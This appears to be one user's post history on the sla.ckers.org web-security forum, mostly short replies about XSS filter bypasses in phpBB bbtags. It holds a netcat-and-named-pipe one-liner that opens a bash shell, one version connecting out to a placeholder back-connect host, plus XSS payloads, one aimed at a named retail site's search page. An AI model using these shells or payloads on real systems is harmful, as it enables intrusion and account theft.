Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Who's got it? Who's giving it away? How to protect your privacy and steal it from other people. For intellectual privacy, personal privacy, and blackhats alike... 

Current Page: 1 of 1
Results 1 - 26 of 26
4 years ago
chosi
Current Ubuntu's netcat does not come with an -e switch (i.e. executing commands directly from within netcat), so I saw this workaround, which might fit into this thread: listening: mkfifo mypipe;cat mypipe|/bin/bash|nc -l 6000 >mypipe;rm mypipe connecting: mkfifo mypipe;cat mypipe|/bin/bash|nc backconnect-address 12344 >mypipe;rm mypipe (change backconnectaddress and/or ports) P.S.:
Forum: Obfuscation
4 years ago
chosi
ugh, congrats man.. and of course the bruteforce starts with A and ends with z :P
Forum: OMG Ponies
4 years ago
chosi
"mixed alpha" does not include weird letters like รถ, does it? ;)
Forum: OMG Ponies
4 years ago
chosi
me too. seems like you have a typo in your challenge :P
Forum: OMG Ponies
4 years ago
chosi
....despite the fact, that you can just fake the referer ;)
Forum: CSRF and Session Info
4 years ago
chosi
The Session-ID is probably bound to the victim's IP address
Forum: XSS Info
4 years ago
chosi
err. there is no CNAME (anymore?). EDIT: nvm, I confused www.google-anon.com with google-anon.com ;)
Forum: Privacy
4 years ago
chosi
oh interesting. thanks for the answers! :)
Forum: XSS Info
5 years ago
chosi
Hi, are there are any known test results, how browser handle HTML-Tags after a closing </html>. I was just wondering how for example an <img>-Tag gets handled depending on browser (and, if this is a serious criterion, doctype). My quick answer would be "yeah, everything after a </html>-Tag gets rendered, evaluated and so on, completely disregarding the closing tag"
Forum: XSS Info
5 years ago
chosi
her texts should be on twitter *scnr*
Forum: OMG Ponies
5 years ago
chosi
...yes!
Forum: OMG Ponies
5 years ago
chosi
rvdh is right, it's most probably crypt(), like used in /etc/shadow. so I'd recommend john the ripper to crack it
Forum: SQL and Code Injection
5 years ago
chosi
PaPPy Wrote: ------------------------------------------------------- > ... > i need some help with this one > http://www.homedecorators.com/search.php?search=%2 > 2%3E%2526lt%26lt%3B%2Fa%26gt%3Bmarquee%3Etest&x=0& > y=0 how about http://www.homedecorators.com/searchTips.php?search=%22%3E/onmouseover=alert(1)// - only an event handler though :) Fnny: NoScript s
Forum: Full Disclosure
5 years ago
chosi
digi7al64 Wrote: > blackboard has so many xss (persistent and > reflective) vuns in it its not funny. We spent an > afternoon on it one day and came back with about > 20 different versions in different spots. yup. if you try three random parameters in an url. at least two of them are vulnerable. great for people new in xss: it's _bound_ to happen ;)
Forum: Full Disclosure
5 years ago
chosi
oh yeah right. thank you ;)
Forum: XSS Info
5 years ago
chosi
hello & merry christmas :) Usually when I find an xss-vulnerability on a webpace, I sending the guy/author an email like "oh, there's an xss-thingie on your site, please fix. see proof of concept (link) and consider escaping input from the web. of course this vulnerability might allow malicious guys to steal user-accounts ..." BUT: I recently found an xss-vulnerability on a w
Forum: XSS Info
5 years ago
chosi
That explains it all. :> I even managed to create a XHR with this limited charset.. Did you know that you dont need the "new" in r=new XMLHttpRequest()? :)
Forum: XSS Info
5 years ago
chosi
OK I got something! :) It works if we use this one: onload=document.location="javascript:alert%281%29// The HTML output would be: <img src="http://..mimetex.cgi?E<a href="http://onload=document.location=&quot;javascript&#058;alert%281%29//" ..> The colon is still filtered, but somehow Firefox doesn't mind it *now*, since we start with a double quot
Forum: XSS Info
5 years ago
chosi
Thanks Gareth, we're getting closer now: The first one is not "URLish" enough - we're being inside a standard url-bbtag of PHP here - so no newlines either (I meant whitespaces including newlines, tabs etc.) The second one, doesn't match the URL Regex as well, phpBB doesnt like backslashes nor single quotes. What I did find out: % does NOT get encoded (contrary to what I sad above -
Forum: XSS Info
5 years ago
chosi
Thank your for finding this out! I didn't have the chance to take a look at the ACP of phpBB3 yet - so I'll talk to the guy with the LaTeX-Idea about this issue ;) Nevertheless: Any idea to call functions like alert(1) without the use of parenthesis AND whitespaces? I didn't get closer than these two: a setter=alert,a=1 -- Not allowed whitespace a=alert,a(1) -- Not allowed parenthesis
Forum: XSS Info
5 years ago
chosi
Okay I continued testing, also using your examples. Let me sum up, what I found out: - I cannot use parentheses( and ), also using %28 and %29 does not work. - No Whitespaces - Input has to look like a URL, checked against with a RegEx - The closing " after my Payload causes JS-Errors. So I will end with // - The img gets loaded so we, of course, use an onload-event. My conclusion is:
Forum: XSS Info
5 years ago
chosi
Ok, javascript: doesnt work, as there is a second whitelist-check against allowed protocols. Dont know why phpBB checks twice :) So we're still looking for a character to seperate html-attributes (except whitespaces and a slash)
Forum: XSS Info
5 years ago
chosi
I *do* have problems exploiting this :> The problem is, that phpBB's limits are quite hard to work with. We can start the content of [-tags only with lettersOnly]
Forum: XSS Info
5 years ago
chosi
Starting with a forward slash is not allowed (I suppose we have to match against a RegEx for urls - will find out about that in phpbb-code as well). I will think about a possible circumvention later - after reading the mentioned topic Thanks for your input - gonna check that out tomorrow :)
Forum: XSS Info
5 years ago
chosi
I got a little further: (again [-brackets are replaced) D(latex]E(url=http://example.org/?;onerror=window.location=//example.org/+//test.html]text(/url]B(/latex]C leads to: D<img src="http://mitaub.sourceforge.net/cgi-bin/mimetex.cgi?E<a href="http://example.org/?;onerror=window.location=//example.org/+//test.html" target="_blank" class="postlink"&
Forum: XSS Info
5 years ago
chosi
Hey, there's a feature in phpBB to create your own bbtags, which can lead to invalid html-code. Please note that I have replaced the character '[' by '(' to prevent *THIS* Forum from interpreting any BBCode ;) There's a quite common method to render LaTeX by inserting an img, e.g.: (LaTeX]{TEXT}(/LaTeX] is replaced with: <img src="http://mitaub.sourceforge.net/cgi-bin/mimet
Forum: XSS Info
Current Page: 1 of 1